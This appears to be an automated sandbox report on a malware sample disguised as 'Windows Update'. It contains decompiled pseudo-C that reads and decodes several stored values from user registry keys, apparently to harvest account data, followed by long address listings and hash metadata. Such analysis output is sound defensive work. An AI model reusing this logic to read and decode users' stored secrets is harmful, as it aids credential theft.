										_t503 = _t502 + 8;
										__eflags = _t423;
										if(__eflags != 0) {
											_t479 = 1;
										}
										goto L11;
									}
								} else {
									_push(_v1828);
									E000FD91F(_t425, _t471, _t479, __eflags);
									_pop(_t477);
									_pop(_t494);
									__eflags = _v8 ^ _t495;
									return L000FBE87(_t471, _t425, _v8 ^ _t495, _t461, _t477, _t494);
								}
								goto L91;
								L10:
								_t247 = E000FCABC( &_v1824, 0x47521c);
								_t503 = _t502 + 8;
								__eflags = _t247;
								if(__eflags != 0) {
									_t249 = E000FCABC( &_v1824, 0x475224);
									_t504 = _t503 + 8;
									__eflags = _t249;
									if(_t249 != 0) {
										 *_t249 = 0x5c;
									}
									_t431 =  &_v1824;
									_t462 = _t431 + 1;
									do {
										_t250 =  *_t431;
										_t431 = _t431 + 1;
										__eflags = _t250;
									} while (_t250 != 0);
									_t433 = _t431 - _t462 - 1;
									__eflags = _t433 - 0x400;
									if(_t433 >= 0x400) {
										L000FCFD2();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t496 = _t504;
										L000FBE9C(0x27a0);
										_v1864 =  *0x482960 ^ _t496;
										__eflags = _v1848;
										_t257 =  !=  ? 0x20119 : 0x20019;
										_t258 =  *0x474018(0x80000001, _v1852, 0,  !=  ? 0x20119 : 0x20019,  &_v11992, _t495);
										__eflags = _t258;
										if(_t258 == 0) {
											_t474 =  *0x474014;
											_v10136 = 0x400;
											_v4108 = 0;
											_t262 =  *_t474(_v10140, 0x4754b8, 0,  &_v10148,  &_v4108,  &_v10136, _t471);
											__eflags = _t262;
											if(_t262 != 0) {
												_v10136 = 0x400;
												 *_t474(_v10140, 0x4754cc, 0,  &_v10148,  &_v4108,  &_v10136);
											}
											_v10136 = 0x400;
											_t266 =  *_t474(_v10140, 0x4754dc, 0,  &_v10148,  &_v3084,  &_v10136, _t479);
											_t482 = _t266;
											_v10144 = 0x1388;
											_t270 =  *_t474(_v10140, 0x4754ec, 0,  &_v10148,  &_v10132,  &_v10144);
											__eflags = _t266;
											if(_t266 == 0) {
												L35:
												_t435 =  &_v3084;
												_t465 = _t435 + 1;
												do {
													_t271 =  *_t435;
													_t435 = _t435 + 1;
													__eflags = _t271;
												} while (_t271 != 0);
												_t272 = _v10144;
												__eflags = _t435 != _t465;
												if(_t435 != _t465) {
													L39:
													_v2060 = 0;
													__eflags = _t272;
													if(_t272 != 0) {
														E000A4CDC(_t425, _t474, _t482,  &_v10132, _t272,  &_v2060, 0x400, 0);
														_t504 = _t504 + 0x14;
													}
													_v10136 = 0x400;
													_v1036 = 0;
													_t483 =  *_t474(_v10140, 0x475324, 0,  &_v10148,  &_v1036,  &_v10136);
													_v10144 = 4;
													_v10152 = 0;
													 *_t474(_v10140, 0x475330, 0,  &_v10148,  &_v10152,  &_v10144);
													__eflags = _t483;
													if(_t483 == 0) {
														__eflags = _v10136 - _t483;
														if(_v10136 > _t483) {
															_t387 = _v10152;
															__eflags = _t387;
															if(_t387 != 0) {
																E000FE864(_t387,  &_v5132, 0x400, 0xa);
																E000FC766( &_v1036, 0x400, 0x47533c);
																E000FC766( &_v1036, 0x400,  &_v5132);
																_t504 = _t504 + 0x28;
															}
														}
													}
													E000A161C(0xb,  &_v4108,  &_v2060);
													_t504 = _t504 + 0xc;
												} else {
													__eflags = _t272;
													if(_t272 != 0) {
														goto L39;
													}
												}
											} else {
												__eflags = _t270;
												if(_t270 == 0) {
													goto L35;
												}
											}
											_v10136 = 0x400;
											_t287 =  *_t474(_v10140, 0x4754fc, 0,  &_v10148,  &_v3084,  &_v10136);
											_t484 = _t287;
											_v10144 = 0x1388;
											_t291 =  *_t474(_v10140, 0x47550c, 0,  &_v10148,  &_v10132,  &_v10144);
											__eflags = _t287;
											if(_t287 == 0) {
												L48:
												_t437 =  &_v3084;
												_t466 = _t437 + 1;
												do {
													_t292 =  *_t437;
													_t437 = _t437 + 1;
													__eflags = _t292;
												} while (_t292 != 0);
												_t293 = _v10144;
												__eflags = _t437 != _t466;
												if(_t437 != _t466) {
													L52:
													_v2060 = 0;
													__eflags = _t293;
													if(_t293 != 0) {
														E000A4CDC(_t425, _t474, _t484,  &_v10132, _t293,  &_v2060, 0x400, 0);
														_t504 = _t504 + 0x14;
													}
													_v10136 = 0x400;
													_v1036 = 0;
													_t485 =  *_t474(_v10140, 0x47535c, 0,  &_v10148,  &_v1036,  &_v10136);
													_v10144 = 4;
													_v10152 = 0;
													 *_t474(_v10140, 0x475368, 0,  &_v10148,  &_v10152,  &_v10144);
													__eflags = _t485;
													if(_t485 == 0) {
														__eflags = _v10136 - _t485;
														if(_v10136 > _t485) {
															_t378 = _v10152;
															__eflags = _t378;
															if(_t378 != 0) {
																E000FE864(_t378,  &_v5132, 0x400, 0xa);
																E000FC766( &_v1036, 0x400, 0x47533c);
																E000FC766( &_v1036, 0x400,  &_v5132);
																_t504 = _t504 + 0x28;
															}
														}
													}
													E000A161C(0xb,  &_v4108,  &_v2060);
													_t504 = _t504 + 0xc;
												} else {
													__eflags = _t293;
													if(_t293 != 0) {
														goto L52;
													}
												}
											} else {
												__eflags = _t291;
												if(_t291 == 0) {
													goto L48;
												}
											}
											_v10136 = 0x400;
											_t308 =  *_t474(_v10140, 0x47551c, 0,  &_v10148,  &_v3084,  &_v10136);
											_t486 = _t308;
											_v10144 = 0x1388;
											_t312 =  *_t474(_v10140, 0x47552c, 0,  &_v10148,  &_v10132,  &_v10144);
											__eflags = _t308;
											if(_t308 == 0) {
												L61:
												_t439 =  &_v3084;
												_t467 = _t439 + 1;
												do {
													_t313 =  *_t439;
													_t439 = _t439 + 1;
													__eflags = _t313;
												} while (_t313 != 0);
												_t314 = _v10144;
												__eflags = _t439 != _t467;
												if(_t439 != _t467) {
													L65:
													_v2060 = 0;
													__eflags = _t314;
													if(_t314 != 0) {
														E000A4CDC(_t425, _t474, _t486,  &_v10132, _t314,  &_v2060, 0x400, 0);
														_t504 = _t504 + 0x14;
													}
													_v10136 = 0x400;
													_v1036 = 0;
													_t487 =  *_t474(_v10140, 0x475390, 0,  &_v10148,  &_v1036,  &_v10136);
													_v10144 = 4;
													_v10152 = 0;
													 *_t474(_v10140, 0x47539c, 0,  &_v10148,  &_v10152,  &_v10144);
													__eflags = _t487;
													if(_t487 == 0) {
														__eflags = _v10136 - _t487;
														if(_v10136 > _t487) {
															_t369 = _v10152;
															__eflags = _t369;
															if(_t369 != 0) {
																E000FE864(_t369,  &_v5132, 0x400, 0xa);
																E000FC766( &_v1036, 0x400, 0x47533c);
																E000FC766( &_v1036, 0x400,  &_v5132);
																_t504 = _t504 + 0x28;
															}
														}
													}
													E000A161C(0xb,  &_v4108,  &_v2060);
													_t504 = _t504 + 0xc;
												} else {
													__eflags = _t314;
													if(_t314 != 0) {
														goto L65;
													}
												}
											} else {
												__eflags = _t312;
												if(_t312 == 0) {
													goto L61;
												}
											}
											_v10136 = 0x400;
											_t329 =  *_t474(_v10140, 0x47553c, 0,  &_v10148,  &_v3084,  &_v10136);
											_t488 = _t329;
											_v10144 = 0x1388;
											_t333 =  *_t474(_v10140, 0x475550, 0,  &_v10148,  &_v10132,  &_v10144);
											__eflags = _t329;
											if(_t329 == 0) {
												L74:
												_t441 =  &_v3084;
												_t467 = _t441 + 1;
												do {
													_t334 =  *_t441;
													_t441 = _t441 + 1;
													__eflags = _t334;
												} while (_t334 != 0);
												_t335 = _v10144;
												__eflags = _t441 != _t467;
												if(_t441 != _t467) {
													L78:
													_v2060 = 0;
													__eflags = _t335;
													if(_t335 != 0) {
														E000A4CDC(_t425, _t474, _t488,  &_v10132, _t335,  &_v2060, 0x400, 0);
														_t504 = _t504 + 0x14;
													}
													_v10136 = 0x400;
													_v1036 = 0;
													 *_t474(_v10140, 0x475564, 0,  &_v10148,  &_v1036,  &_v10136);
													E000A161C(0xb,  &_v4108,  &_v2060);
													_t504 = _t504 + 0xc;
												} else {
													__eflags = _t335;
													if(_t335 != 0) {
														goto L78;
													}
												}
											} else {
												__eflags = _t333;
												if(_t333 == 0) {
													goto L74;
												}
											}
											_v10136 = 0x400;
											_t346 =  *_t474(_v10140, 0x475574, 0,  &_v10148,  &_v3084,  &_v10136);
											_v10144 = 0x1388;
											_t350 =  *_t474(_v10140, 0x475584, 0,  &_v10148,  &_v10132,  &_v10144);
											__eflags = _t346;
											_pop(_t490);
											if(_t346 == 0) {
												L83:
												_t352 = E000FC802( &_v3084, 0x475594);
												_t505 = _t504 + 8;
												__eflags = _t352;
												if(_t352 != 0) {
													_t445 =  &_v3084;
													_t467 = _t445 + 1;
													do {
														_t356 =  *_t445;
														_t445 = _t445 + 1;
														__eflags = _t356;
													} while (_t356 != 0);
													__eflags = _t445 != _t467;
													if(_t445 != _t467) {
														_v2060 = _t356;
														_t357 = _v10144;
														__eflags = _t357;
														if(_t357 != 0) {
															E000A4CDC(_t425, _t474, _t490,  &_v10132, _t357,  &_v2060, 0x400, 0);
															_t505 = _t505 + 0x14;
														}
														_v10136 = 0x400;
														_v1036 = 0;
														 *_t474(_v10140, 0x47559c, 0,  &_v10148,  &_v1036,  &_v10136);
														E000A161C(0xb,  &_v4108,  &_v2060);
													}
												}
											} else {
												__eflags = _t350;
												if(_t350 == 0) {
													goto L83;
												}
											}
											 *0x474010(_v10140);
											__eflags = _v12 ^ _t496;
											_pop(_t475);
											return L000FBE87(1, _t425, _v12 ^ _t496, _t467, _t475, _t490);
										} else {
											__eflags = _v12 ^ _t496;
											return L000FBE87(0, _t425, _v12 ^ _t496,  &_v11992, _t471, _t479);
										}
									} else {
										_push(_t425);
										 *((char*)(_t495 + _t433 - 0x71c)) = _t250;
										_t403 = E000FCABC( &_v1824, 0x475228);
										_t457 =  &_v280;
										_t507 = _t504 + 8;
										_t426 = _t403;
										_t31 = _t457 + 1; // 0x1
										_t468 = _t31;
										do {
											_t404 =  *_t457;
											_t457 = _t457 + 1;
											__eflags = _t404;
										} while (_t404 != 0);
										_t458 = _t457 - _t468;
										__eflags = _t458;
										_t469 =  &_v20;
										_t491 = _t469 + 1;
										do {
											_t405 =  *_t469;
											_t469 = _t469 + 1;
											__eflags = _t405;
										} while (_t405 != 0);
										_t461 = _t469 - _t491;
										__eflags = _t461;
										_t492 = _t426;
										_t34 = _t492 + 1; // 0x1
										_t476 = _t34;
										do {
											_t406 =  *_t492;
											_t492 = _t492 + 1;
											__eflags = _t406;
										} while (_t406 != 0);
										_t35 = _t458 + 3; // 0x4
										_t479 = _t492 - _t476 + _t35 + _t461;
										_t409 = L000FCD57(_t426, _t476, _t492 - _t476 + _t35 + _t461);
										_t471 = _t409;
										_t500 = _t507 + 4;
										__eflags = _t409;
										if(__eflags != 0) {
											E000FC711(_t471, _t479,  &_v280);
											E000FC766(_t471, _t479, 0x474d84);
											E000FC766(_t471, _t479,  &_v20);
											E000FC766(_t471, _t479, 0x474d84);
											_t38 = _t426 + 1; // 0x1
											E000FC766(_t471, _t479, _t38);
											_t500 = _t500 + 0x3c;
										}
										_pop(_t425);
										goto L27;
									}
								} else {
									goto L11;
								}
							}
						}
					}
				} else {
					 *0x47412c();
					L2:
					_pop(_t472);
					_pop(_t480);
					return L000FBE87(0, _t425, _v8 ^ _t495, _t461, _t472, _t480);
				}
				L91:
			}

















































































































                                                                                                                    0x000a377c
                                                                                                                    0x000a378f
                                                                                                                    0x000a3796
                                                                                                                    0x000a37a0
                                                                                                                    0x000a37a8
                                                                                                                    0x000a37ab
                                                                                                                    0x000a37b4
                                                                                                                    0x000a37b5
                                                                                                                    0x000a37b7
                                                                                                                    0x000a37b8
                                                                                                                    0x000a37b9
                                                                                                                    0x000a37bb
                                                                                                                    0x000a37bc
                                                                                                                    0x000a37c1
                                                                                                                    0x000a37cb
                                                                                                                    0x000a37f8
                                                                                                                    0x000a380e
                                                                                                                    0x000a3823
                                                                                                                    0x000a3839
                                                                                                                    0x000a3851
                                                                                                                    0x000a3857
                                                                                                                    0x000a385c
                                                                                                                    0x000a385f
                                                                                                                    0x000a3861
                                                                                                                    0x00000000
                                                                                                                    0x000a3867
                                                                                                                    0x000a3867
                                                                                                                    0x000a386d
                                                                                                                    0x000a386f
                                                                                                                    0x00000000
                                                                                                                    0x000a3875
                                                                                                                    0x000a3875
                                                                                                                    0x000a387c
                                                                                                                    0x000a3881
                                                                                                                    0x000a3882
                                                                                                                    0x000a3887
                                                                                                                    0x000a388a
                                                                                                                    0x000a388c
                                                                                                                    0x000a3a0b
                                                                                                                    0x000a3a0b
                                                                                                                    0x000a3a11
                                                                                                                    0x000a3a1e
                                                                                                                    0x000a3a1f
                                                                                                                    0x000a3a21
                                                                                                                    0x000a3a2a
                                                                                                                    0x000a3892
                                                                                                                    0x000a3892
                                                                                                                    0x000a38e5
                                                                                                                    0x000a38e5
                                                                                                                    0x000a38f1
                                                                                                                    0x000a38f6
                                                                                                                    0x000a38f7
                                                                                                                    0x000a38fc
                                                                                                                    0x000a38ff
                                                                                                                    0x000a3901
                                                                                                                    0x000a389c
                                                                                                                    0x000a38a8
                                                                                                                    0x000a38ad
                                                                                                                    0x000a38b6
                                                                                                                    0x000a38b8
                                                                                                                    0x00000000
                                                                                                                    0x000a38ba
                                                                                                                    0x000a38c0
                                                                                                                    0x000a38c5
                                                                                                                    0x000a38c8
                                                                                                                    0x000a38ca
                                                                                                                    0x000a38cc
                                                                                                                    0x000a38cc
                                                                                                                    0x00000000
                                                                                                                    0x000a38ca
                                                                                                                    0x000a3903
                                                                                                                    0x000a3903
                                                                                                                    0x000a3909
                                                                                                                    0x000a3913
                                                                                                                    0x000a3914
                                                                                                                    0x000a3918
                                                                                                                    0x000a3922
                                                                                                                    0x000a3922
                                                                                                                    0x00000000
                                                                                                                    0x000a38d3
                                                                                                                    0x000a38d9
                                                                                                                    0x000a38de
                                                                                                                    0x000a38e1
                                                                                                                    0x000a38e3
                                                                                                                    0x000a392f
                                                                                                                    0x000a3934
                                                                                                                    0x000a3937
                                                                                                                    0x000a3939
                                                                                                                    0x000a393b
                                                                                                                    0x000a393b
                                                                                                                    0x000a393e
                                                                                                                    0x000a3944
                                                                                                                    0x000a394c
                                                                                                                    0x000a394c
                                                                                                                    0x000a394e
                                                                                                                    0x000a394f
                                                                                                                    0x000a394f
                                                                                                                    0x000a3955
                                                                                                                    0x000a3956
                                                                                                                    0x000a395c
                                                                                                                    0x000a3a2b
                                                                                                                    0x000a3a30
                                                                                                                    0x000a3a31
                                                                                                                    0x000a3a32
                                                                                                                    0x000a3a33
                                                                                                                    0x000a3a34
                                                                                                                    0x000a3a35
                                                                                                                    0x000a3a36
                                                                                                                    0x000a3a37
                                                                                                                    0x000a3a38
                                                                                                                    0x000a3a39
                                                                                                                    0x000a3a3a
                                                                                                                    0x000a3a3b
                                                                                                                    0x000a3a3d
                                                                                                                    0x000a3a44
                                                                                                                    0x000a3a50
                                                                                                                    0x000a3a53
                                                                                                                    0x000a3a64
                                                                                                                    0x000a3a77
                                                                                                                    0x000a3a7d
                                                                                                                    0x000a3a7f
                                                                                                                    0x000a3a92
                                                                                                                    0x000a3aba
                                                                                                                    0x000a3ac4
                                                                                                                    0x000a3acb
                                                                                                                    0x000a3acd
                                                                                                                    0x000a3acf
                                                                                                                    0x000a3af3
                                                                                                                    0x000a3afd
                                                                                                                    0x000a3afd
                                                                                                                    0x000a3b22
                                                                                                                    0x000a3b2c
                                                                                                                    0x000a3b2e
                                                                                                                    0x000a3b52
                                                                                                                    0x000a3b5c
                                                                                                                    0x000a3b5e
                                                                                                                    0x000a3b60
                                                                                                                    0x000a3b6a
                                                                                                                    0x000a3b6a
                                                                                                                    0x000a3b70
                                                                                                                    0x000a3b73
                                                                                                                    0x000a3b73
                                                                                                                    0x000a3b75
                                                                                                                    0x000a3b76
                                                                                                                    0x000a3b76
                                                                                                                    0x000a3b7a
                                                                                                                    0x000a3b80
                                                                                                                    0x000a3b82
                                                                                                                    0x000a3b8c
                                                                                                                    0x000a3b8c
                                                                                                                    0x000a3b93
                                                                                                                    0x000a3b95
                                                                                                                    0x000a3bad
                                                                                                                    0x000a3bb2
                                                                                                                    0x000a3bb2
                                                                                                                    0x000a3bd7
                                                                                                                    0x000a3be1
                                                                                                                    0x000a3bea
                                                                                                                    0x000a3c0e
                                                                                                                    0x000a3c18
                                                                                                                    0x000a3c22
                                                                                                                    0x000a3c24
                                                                                                                    0x000a3c26
                                                                                                                    0x000a3c28
                                                                                                                    0x000a3c2e
                                                                                                                    0x000a3c30
                                                                                                                    0x000a3c36
                                                                                                                    0x000a3c38
                                                                                                                    0x000a3c49
                                                                                                                    0x000a3c5f
                                                                                                                    0x000a3c77
                                                                                                                    0x000a3c7c
                                                                                                                    0x000a3c7c
                                                                                                                    0x000a3c38
                                                                                                                    0x000a3c2e
                                                                                                                    0x000a3c8f
                                                                                                                    0x000a3c94
                                                                                                                    0x000a3b84
                                                                                                                    0x000a3b84
                                                                                                                    0x000a3b86
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3b86
                                                                                                                    0x000a3b62
                                                                                                                    0x000a3b62
                                                                                                                    0x000a3b64
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3b64
                                                                                                                    0x000a3cb9
                                                                                                                    0x000a3cc3
                                                                                                                    0x000a3cc5
                                                                                                                    0x000a3ce9
                                                                                                                    0x000a3cf3
                                                                                                                    0x000a3cf5
                                                                                                                    0x000a3cf7
                                                                                                                    0x000a3d01
                                                                                                                    0x000a3d01
                                                                                                                    0x000a3d07
                                                                                                                    0x000a3d0c
                                                                                                                    0x000a3d0c
                                                                                                                    0x000a3d0e
                                                                                                                    0x000a3d0f
                                                                                                                    0x000a3d0f
                                                                                                                    0x000a3d13
                                                                                                                    0x000a3d19
                                                                                                                    0x000a3d1b
                                                                                                                    0x000a3d25
                                                                                                                    0x000a3d25
                                                                                                                    0x000a3d2c
                                                                                                                    0x000a3d2e
                                                                                                                    0x000a3d46
                                                                                                                    0x000a3d4b
                                                                                                                    0x000a3d4b
                                                                                                                    0x000a3d70
                                                                                                                    0x000a3d7a
                                                                                                                    0x000a3d83
                                                                                                                    0x000a3da7
                                                                                                                    0x000a3db1
                                                                                                                    0x000a3dbb
                                                                                                                    0x000a3dbd
                                                                                                                    0x000a3dbf
                                                                                                                    0x000a3dc1
                                                                                                                    0x000a3dc7
                                                                                                                    0x000a3dc9
                                                                                                                    0x000a3dcf
                                                                                                                    0x000a3dd1
                                                                                                                    0x000a3de2
                                                                                                                    0x000a3df8
                                                                                                                    0x000a3e10
                                                                                                                    0x000a3e15
                                                                                                                    0x000a3e15
                                                                                                                    0x000a3dd1
                                                                                                                    0x000a3dc7
                                                                                                                    0x000a3e28
                                                                                                                    0x000a3e2d
                                                                                                                    0x000a3d1d
                                                                                                                    0x000a3d1d
                                                                                                                    0x000a3d1f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3d1f
                                                                                                                    0x000a3cf9
                                                                                                                    0x000a3cf9
                                                                                                                    0x000a3cfb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3cfb
                                                                                                                    0x000a3e52
                                                                                                                    0x000a3e5c
                                                                                                                    0x000a3e5e
                                                                                                                    0x000a3e82
                                                                                                                    0x000a3e8c
                                                                                                                    0x000a3e8e
                                                                                                                    0x000a3e90
                                                                                                                    0x000a3e9a
                                                                                                                    0x000a3e9a
                                                                                                                    0x000a3ea0
                                                                                                                    0x000a3ea3
                                                                                                                    0x000a3ea3
                                                                                                                    0x000a3ea5
                                                                                                                    0x000a3ea6
                                                                                                                    0x000a3ea6
                                                                                                                    0x000a3eaa
                                                                                                                    0x000a3eb0
                                                                                                                    0x000a3eb2
                                                                                                                    0x000a3ebc
                                                                                                                    0x000a3ebc
                                                                                                                    0x000a3ec3
                                                                                                                    0x000a3ec5
                                                                                                                    0x000a3edd
                                                                                                                    0x000a3ee2
                                                                                                                    0x000a3ee2
                                                                                                                    0x000a3f07
                                                                                                                    0x000a3f11
                                                                                                                    0x000a3f1a
                                                                                                                    0x000a3f3e
                                                                                                                    0x000a3f48
                                                                                                                    0x000a3f52
                                                                                                                    0x000a3f54
                                                                                                                    0x000a3f56
                                                                                                                    0x000a3f58
                                                                                                                    0x000a3f5e
                                                                                                                    0x000a3f60
                                                                                                                    0x000a3f66
                                                                                                                    0x000a3f68
                                                                                                                    0x000a3f79
                                                                                                                    0x000a3f8f
                                                                                                                    0x000a3fa7
                                                                                                                    0x000a3fac
                                                                                                                    0x000a3fac
                                                                                                                    0x000a3f68
                                                                                                                    0x000a3f5e
                                                                                                                    0x000a3fbf
                                                                                                                    0x000a3fc4
                                                                                                                    0x000a3eb4
                                                                                                                    0x000a3eb4
                                                                                                                    0x000a3eb6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3eb6
                                                                                                                    0x000a3e92
                                                                                                                    0x000a3e92
                                                                                                                    0x000a3e94
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a3e94
                                                                                                                    0x000a3fe9
                                                                                                                    0x000a3ff3
                                                                                                                    0x000a3ff5
                                                                                                                    0x000a4019
                                                                                                                    0x000a4023
                                                                                                                    0x000a4025
                                                                                                                    0x000a4027
                                                                                                                    0x000a4031
                                                                                                                    0x000a4031
                                                                                                                    0x000a4037
                                                                                                                    0x000a403c
                                                                                                                    0x000a403c
                                                                                                                    0x000a403e
                                                                                                                    0x000a403f
                                                                                                                    0x000a403f
                                                                                                                    0x000a4043
                                                                                                                    0x000a4049
                                                                                                                    0x000a404b
                                                                                                                    0x000a4051
                                                                                                                    0x000a4051
                                                                                                                    0x000a4058
                                                                                                                    0x000a405a
                                                                                                                    0x000a4072
                                                                                                                    0x000a4077
                                                                                                                    0x000a4077
                                                                                                                    0x000a409c
                                                                                                                    0x000a40a6
                                                                                                                    0x000a40ad
                                                                                                                    0x000a40bf
                                                                                                                    0x000a40c4
                                                                                                                    0x000a404d
                                                                                                                    0x000a404d
                                                                                                                    0x000a404f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a404f
                                                                                                                    0x000a4029
                                                                                                                    0x000a4029
                                                                                                                    0x000a402b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a402b
                                                                                                                    0x000a40e9
                                                                                                                    0x000a40f3
                                                                                                                    0x000a4119
                                                                                                                    0x000a4123
                                                                                                                    0x000a4125
                                                                                                                    0x000a4127
                                                                                                                    0x000a4128
                                                                                                                    0x000a4132
                                                                                                                    0x000a413e
                                                                                                                    0x000a4143
                                                                                                                    0x000a4146
                                                                                                                    0x000a4148
                                                                                                                    0x000a414e
                                                                                                                    0x000a4154
                                                                                                                    0x000a415c
                                                                                                                    0x000a415c
                                                                                                                    0x000a415e
                                                                                                                    0x000a415f
                                                                                                                    0x000a415f
                                                                                                                    0x000a4163
                                                                                                                    0x000a4165
                                                                                                                    0x000a4167
                                                                                                                    0x000a416d
                                                                                                                    0x000a4173
                                                                                                                    0x000a4175
                                                                                                                    0x000a418d
                                                                                                                    0x000a4192
                                                                                                                    0x000a4192
                                                                                                                    0x000a41b7
                                                                                                                    0x000a41c1
                                                                                                                    0x000a41c8
                                                                                                                    0x000a41da
                                                                                                                    0x000a41df
                                                                                                                    0x000a4165
                                                                                                                    0x000a412a
                                                                                                                    0x000a412a
                                                                                                                    0x000a412c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a412c
                                                                                                                    0x000a41e8
                                                                                                                    0x000a41f1
                                                                                                                    0x000a41f8
                                                                                                                    0x000a4201
                                                                                                                    0x000a3a81
                                                                                                                    0x000a3a86
                                                                                                                    0x000a3a90
                                                                                                                    0x000a3a90
                                                                                                                    0x000a3962
                                                                                                                    0x000a3962
                                                                                                                    0x000a3963
                                                                                                                    0x000a3976
                                                                                                                    0x000a397b
                                                                                                                    0x000a3981
                                                                                                                    0x000a3984
                                                                                                                    0x000a3986
                                                                                                                    0x000a3986
                                                                                                                    0x000a398c
                                                                                                                    0x000a398c
                                                                                                                    0x000a398e
                                                                                                                    0x000a398f
                                                                                                                    0x000a398f
                                                                                                                    0x000a3993
                                                                                                                    0x000a3993
                                                                                                                    0x000a3995
                                                                                                                    0x000a3998
                                                                                                                    0x000a399c
                                                                                                                    0x000a399c
                                                                                                                    0x000a399e
                                                                                                                    0x000a399f
                                                                                                                    0x000a399f
                                                                                                                    0x000a39a3
                                                                                                                    0x000a39a3
                                                                                                                    0x000a39a5
                                                                                                                    0x000a39a7
                                                                                                                    0x000a39a7
                                                                                                                    0x000a39ac
                                                                                                                    0x000a39ac
                                                                                                                    0x000a39ae
                                                                                                                    0x000a39af
                                                                                                                    0x000a39af
                                                                                                                    0x000a39b3
                                                                                                                    0x000a39ba
                                                                                                                    0x000a39bd
                                                                                                                    0x000a39c2
                                                                                                                    0x000a39c4
                                                                                                                    0x000a39c7
                                                                                                                    0x000a39c9
                                                                                                                    0x000a39d4
                                                                                                                    0x000a39e0
                                                                                                                    0x000a39eb
                                                                                                                    0x000a39f7
                                                                                                                    0x000a39fc
                                                                                                                    0x000a3a02
                                                                                                                    0x000a3a07
                                                                                                                    0x000a3a07
                                                                                                                    0x000a3a0a
                                                                                                                    0x00000000
                                                                                                                    0x000a3a0a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000a38e3
                                                                                                                    0x000a388c
                                                                                                                    0x000a386f
                                                                                                                    0x000a37cd
                                                                                                                    0x000a37cd
                                                                                                                    0x000a37d3
                                                                                                                    0x000a37d3
                                                                                                                    0x000a37d6
                                                                                                                    0x000a37e4
                                                                                                                    0x000a37e4
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _fgets$__wfopen_s_memset_strstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1321736151-0
                                                                                                                    • Opcode ID: c11e26276aef88e4cb050416062e829385959170c87894ea540f9505665212c5
                                                                                                                    • Instruction ID: f8c28c27a20ce8cc5ec5d41578a1683f06485e4720d6cf0fa2d233d151e80a69
                                                                                                                    • Opcode Fuzzy Hash: c11e26276aef88e4cb050416062e829385959170c87894ea540f9505665212c5
                                                                                                                    • Instruction Fuzzy Hash: F5712572D4421C6ADB20EAA48C46FFB77AC9F45704F0001A6FA0CA7443EB75AB059FA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00023D37 Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E00023D37(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v140;
				char _v156;
				intOrPtr _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t29;
				intOrPtr _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t65;

				_t56 = __edx;
				_v8 =  *0x481f80 ^ _t60;
				_v160 = _a16;
				_t21 = E00034587(_t57, _a8);
				_t48 =  *0x48707c;
				_t62 = _t61 + 4;
				_t59 = _t21;
				if(_t48 == 0) {
					_v156 = 0x94;
					 *0x470118( &_v156);
					_t48 = (0 | _v140 == 0x00000002) + 1;
					 *0x48707c = _t48;
				}
				_push(0);
				_push(0);
				_push(0);
				_push(_t59);
				if(_t48 != 2) {
					_t13 =  *0x4700c0() + 3; // 0x3
					_t46 = _t13;
					_t58 = E00077BCE(_t46, _t57, _t46);
					_t63 = _t62 + 4;
					if(_t58 == 0) {
						goto L4;
					} else {
						 *0x4700c0(_t59, _t46, _t58, 0);
						L00078F6C(_t59);
						_t29 = E0003B607(_t58);
						_t46 = _t29;
						_t65 = _t63 + 8;
						if(_t29 != 0) {
							_t59 = E00072987(_t48, _t46);
							L00078F6C(_t46);
							_t65 = _t65 + 8;
						} else {
							_t59 = 0;
						}
						L00078F6C(_t58);
						goto L12;
					}
				} else {
					_t10 =  *0x4700c4() + 3; // 0x3
					_t46 = _t10;
					_t53 = _t46 + _t46;
					_t58 = E00077BCE(_t46, _t57, _t46 + _t46);
					_t63 = _t62 + 4;
					if(_t58 != 0) {
						 *0x4700c4(_t59, _t46, _t58, 0);
						L00078F6C(_t59);
						_t59 = E00072987(_t53, _t58);
						L00078F6C(_t58);
						L12:
						if(_t59 == 0) {
							goto L5;
						} else {
							E000271A7( *((intOrPtr*)(_a4 + 8)), _v160, 0x470310, _t59);
							L00078F6C(_t59);
							return E000772F2(0, _t46, _v8 ^ _t60, _t56, _t58, _t59);
						}
					} else {
						L4:
						L00078F6C(_t59);
						L5:
						return E000772F2(7, _t46, _v8 ^ _t60, _t56, _t58, _t59);
					}
				}
			}






















                                                                                                                    0x00023d37
                                                                                                                    0x00023d47
                                                                                                                    0x00023d54
                                                                                                                    0x00023d5a
                                                                                                                    0x00023d5f
                                                                                                                    0x00023d65
                                                                                                                    0x00023d68
                                                                                                                    0x00023d6c
                                                                                                                    0x00023d75
                                                                                                                    0x00023d7f
